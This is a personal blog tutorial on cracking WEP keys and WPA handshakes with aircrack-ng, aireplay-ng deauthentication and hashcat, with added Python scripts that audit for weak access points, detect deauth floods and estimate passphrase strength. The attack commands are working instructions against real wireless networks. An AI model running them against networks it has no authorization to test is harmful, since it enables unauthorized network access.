Steve Borba

My notes; I hope they help you. Feel free to comment/add to them.

Wireless Cracking (with Kali and Aircrack)

I have been told how insecure WEP is and that it should not be used, but I didn’t know how bad it was until I did this. The first one I did fell within a day, the next fell within an hour and the third in four hours, so it wasn’t just luck. But now, for you to see how easy it is, here is how:

First off we need to get the wireless adapter working; there are lots of articles out there about that, so I am not gonna spend too much time covering it. A couple of hints I can give: to get NetworkManager to stop messing with the interface, add this to /etc/network/interfaces:

iface wlan0 inet manual
        up ifconfig wlan0 up promisc

To check that it has stopped managing the interface, run this (you may need to restart network-manager first):

nmcli dev status

You want to see “wlan0 wifi unmanaged”; if you don’t, try this:

nmcli dev set wlan0 managed no

Then we need to start monitoring:

airmon-ng start wlan0

(On one of my PCs it created a virtual sub-interface, and on another it didn’t.)

Then we need to start looking around for a network to attempt to crack:

airodump-ng wlan0mon

[Screenshot: airodump-ng scan results]

Now we want to capture, but make sure we stay on one channel (in this case channel 6) so we can collect as many IVs as possible (while airodump-ng is hopping through the channels, you miss some):

airodump-ng wlan0mon -w channel6 -c 6

We need to run that until we have enough IVs (the #Data column; I cracked one with 8,000 but that was lucky, you are more likely to succeed with more, 47,000 for this one). After it has run for a while, attempt to crack it (you can do this in another window and leave the dump going):

aircrack-ng channel*.cap

[Screenshot: aircrack-ng recovering the WEP key]
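When airodump-ng is run with -w as above it also writes a CSV table next to the .cap (channel6-01.csv here). The script below is an added example, not from the original post: it reads that CSV and lists every access point still advertising WEP or open authentication together with the IV count collected against it, which is the check a network owner runs against their own estate to find networks that would fall to the steps above. The column layout is the one airodump-ng writes to <prefix>-01.csv (AP table, blank line, station table); SAMPLE_CSV is constructed, with placeholder MACs, and ESSIDs containing commas are not handled.

```python
"""Audit an airodump-ng CSV dump for access points still using WEP or open auth.

Added example, not from the original post. Assumes the airodump-ng <prefix>-01.csv
layout: an AP table, a blank line, then a station table. SAMPLE_CSV is constructed.
"""
import csv
import io

# Constructed sample in airodump-ng's CSV layout; BSSIDs/stations are placeholders.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2016-01-01 10:00:00, 2016-01-01 10:30:00,  6,  54, WEP, WEP, OPN, -40, 1200, 47000,   0.  0.  0.  0,   7, OldNet1,
00:11:22:33:44:02, 2016-01-01 10:00:00, 2016-01-01 10:30:00, 11,  54, WPA2, CCMP, PSK, -55,  900,     0,   0.  0.  0.  0,   6, Office,
00:11:22:33:44:03, 2016-01-01 10:00:00, 2016-01-01 10:30:00,  1,  54, OPN,  , , -70,  300,     0,   0.  0.  0.  0,   9, GuestOpen,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2016-01-01 10:05:00, 2016-01-01 10:29:00, -50, 4000, 00:11:22:33:44:01, OldNet1
"""

# Privacy values airodump-ng prints that mean "no usable encryption".
WEAK_PRIVACY = {"WEP", "OPN"}


def parse_access_points(text):
    """Return one dict per row of the AP table (everything before the blank line)."""
    ap_section = text.split("\n\n", 1)[0]
    reader = csv.reader(io.StringIO(ap_section), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    aps = []
    for row in reader:
        if len(row) < len(header) - 1:  # skip blank or truncated rows
            continue
        aps.append({h: v.strip() for h, v in zip(header, row)})
    return aps


def find_weak_aps(text):
    """Return (ESSID, BSSID, privacy, IV count) for every WEP or open AP in the dump."""
    weak = []
    for ap in parse_access_points(text):
        # Privacy can list several schemes (e.g. "WPA2 WPA"); flag if any is weak.
        if set(ap["Privacy"].split()) & WEAK_PRIVACY:
            weak.append((ap["ESSID"], ap["BSSID"], ap["Privacy"], int(ap["# IV"] or 0)))
    return weak


if __name__ == "__main__":
    for essid, bssid, privacy, ivs in find_weak_aps(SAMPLE_CSV):
        print(f"{essid:<16} {bssid}  {privacy:<5} IVs collected: {ivs}")
```

Run it against a real dump with open("channel6-01.csv").read() in place of SAMPLE_CSV; any AP it lists is one that the WEP steps above apply to, and a high IV count on your own AP is a sign of how much traffic an observer has already seen.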

Now to get on the network: stop monitor mode (the interface name is whatever airmon-ng created, wlan0mon here) and enter the key aircrack-ng printed, as hex without the colons:

airmon-ng stop wlan0mon
iwconfig wlan0 essid "<ESSID>"
iwconfig wlan0 key XXXXXXXXXX
iwconfig wlan0 enc on

Ok, so you are on that network, now what? Well, that is out of scope for this, but tcpdump is a good start, as is grabbing an IP with “dhclient wlan0” and running nmap, but if it isn’t your network you might not want to do that.

WPA

With WPA you want to grab a handshake and then crack it offline. A handshake happens when a client joins the network, and you can force one by deauth’ing a client (leave the airodump-ng capture from above running so the handshake is recorded):

aireplay-ng wlan0mon -0 1 -a {BSSID MAC} -c {STATION MAC}

At the top of the airodump-ng window you’ll see “WPA handshake: 00:18:0A:XX:XX:XX” when it happens. Then convert the capture to a hashcat file (or use aircrack-ng with a dictionary: “aircrack-ng channel*.cap -w full-dictionary”):

wpaclean {cleaned.cap} {capture.cap}
aircrack-ng {cleaned.cap} -J {out prefix}
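The deauth step above is also what makes the attack visible: a client leaving on its own produces one deauthentication frame, while forcing a handshake produces a burst of them. The detector below is an added example, not from the original post, of the check a wireless IDS runs on a monitor-mode capture: it parses the 802.11 management header of each frame and raises one alert per BSSID when more than a threshold of deauth/disassoc frames arrive inside a sliding window. The frames in sample_capture() are constructed in memory with placeholder MACs, not taken from a real capture.

```python
"""Flag deauthentication floods in a stream of captured 802.11 frames.

Added example, not from the original post. Frames are (timestamp, raw_bytes) pairs;
the sample stream is constructed in memory with placeholder addresses.
"""
import struct
from collections import defaultdict, deque

# Frame control byte 0 = protocol version (2 bits) | type (2 bits) | subtype (4 bits).
# Management frames have type 0; deauth is subtype 12, disassoc subtype 10, beacon 8.
DEAUTH = 0xC0
DISASSOC = 0xA0
BEACON = 0x80


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_header(frame):
    """Return (subtype_bits, addr1, addr2, addr3) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if fc0 & 0x0C != 0x00:  # bits 2-3 hold the frame type; 0 = management
        return None
    return fc0 & 0xF0, mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22])


def detect_deauth_floods(frames, threshold=10, window=5.0):
    """Return [(timestamp, bssid, count)] with one alert per BSSID per burst.

    A burst is `threshold` or more deauth/disassoc frames naming the same BSSID
    (addr3) within `window` seconds; the alert fires when the threshold is first hit.
    """
    recent = defaultdict(deque)  # bssid -> timestamps of recent deauth/disassoc frames
    alerted = set()
    alerts = []
    for ts, raw in frames:
        parsed = parse_mgmt_header(raw)
        if parsed is None:
            continue
        subtype, _addr1, _addr2, bssid = parsed
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:  # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append((ts, bssid, len(q)))
        elif len(q) < threshold:
            alerted.discard(bssid)  # burst decayed; a new one may alert again
    return alerts


def constructed_frame(fc0, addr1, addr2, addr3, reason=7):
    """Build a minimal management frame (FC, duration, 3 addresses, seq ctrl, body)
    purely as test input for the parser above."""
    addrs = b"".join(bytes.fromhex(a.replace(":", "")) for a in (addr1, addr2, addr3))
    return bytes([fc0, 0x00]) + b"\x00\x00" + addrs + b"\x00\x00" + struct.pack("<H", reason)


AP = "00:11:22:33:44:01"            # placeholder BSSID
STATION = "aa:bb:cc:dd:ee:01"       # placeholder client


def sample_capture():
    """Constructed stream: one normal deauth, a beacon, then a 20-frame burst."""
    frames = [
        (0.0, constructed_frame(DEAUTH, STATION, AP, AP)),        # client left; not a flood
        (0.5, constructed_frame(BEACON, "ff:ff:ff:ff:ff:ff", AP, AP)),
    ]
    frames += [(10.0 + i * 0.05, constructed_frame(DEAUTH, STATION, AP, AP)) for i in range(20)]
    return frames


if __name__ == "__main__":
    for ts, bssid, count in detect_deauth_floods(sample_capture()):
        print(f"t={ts:.2f}s deauth flood against {bssid}: {count} frames in window")
```

The only mitigation on the air itself is 802.11w (Protected Management Frames), which makes deauth and disassoc frames authenticated so that spoofed ones are discarded by clients and APs that support it; detection like the above is what you rely on where PMF is not enabled.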

To use hashcat, here are a couple of examples; hashcat is a huge beast and I will be doing another post with more ideas and commands.

hashcat -m 2500 hash.hccap dictionary
hashcat -m 2500 -a 3 hash.hccap ?d?d?d?d?d?d?d?d?d?d
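The two hashcat runs above represent very different amounts of work, and the reason is the key derivation: WPA/WPA2-PSK defines PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), so every candidate costs 4096 HMAC rounds and the SSID acts as a salt. The script below is an added example, not from the original post, that derives the PMK that way and counts the candidates a hashcat mask such as ?d?d?d?d?d?d?d?d?d?d enumerates, so a network owner can estimate how long a passphrase of a given shape holds up; ASSUMED_RATE is an assumed guess rate, not a measurement.

```python
"""Estimate how a WPA2 passphrase holds up against the dictionary/mask runs above.

Added example, not from the original post. PBKDF2 parameters are those of
WPA/WPA2-PSK; ASSUMED_RATE is an assumption used only for the printed estimate.
"""
import hashlib

# Sizes of the hashcat built-in charsets used in masks.
MASK_CHARSETS = {"?d": 10, "?l": 26, "?u": 26, "?s": 33, "?a": 95}
ASSUMED_RATE = 100_000  # PMK computations per second; an assumed figure


def derive_pmk(passphrase, ssid):
    """PMK as WPA/WPA2-PSK defines it: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def mask_keyspace(mask):
    """Number of candidates a hashcat mask enumerates; literal characters count once."""
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?":
            token = mask[i:i + 2]
            if token not in MASK_CHARSETS:
                raise ValueError(f"unknown mask token {token!r}")
            total *= MASK_CHARSETS[token]
            i += 2
        else:
            i += 1
    return total


def seconds_to_exhaust(keyspace, rate=ASSUMED_RATE):
    """Worst-case time to try every candidate at `rate` guesses per second."""
    return keyspace / rate


if __name__ == "__main__":
    # Constructed credentials for the demo; the SSID changes the PMK even for the same passphrase.
    for ssid in ("Office", "Office2"):
        print(ssid, derive_pmk("correct horse battery staple", ssid).hex()[:16], "...")
    for mask in ("?d?d?d?d?d?d?d?d?d?d", "?u?l?l?l?l?l?l?d?d?s", "?a?a?a?a?a?a?a?a?a?a?a?a"):
        days = seconds_to_exhaust(mask_keyspace(mask)) / 86400
        print(f"{mask:<28} {mask_keyspace(mask):>25,d} candidates  ~{days:,.1f} days")
```

The takeaway for the defender is that the iteration count bounds the guess rate and the SSID salt defeats precomputed tables for uncommon SSIDs, but a ten-digit passphrase is still only 10^10 candidates; the lever you control is the passphrase's length and charset.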
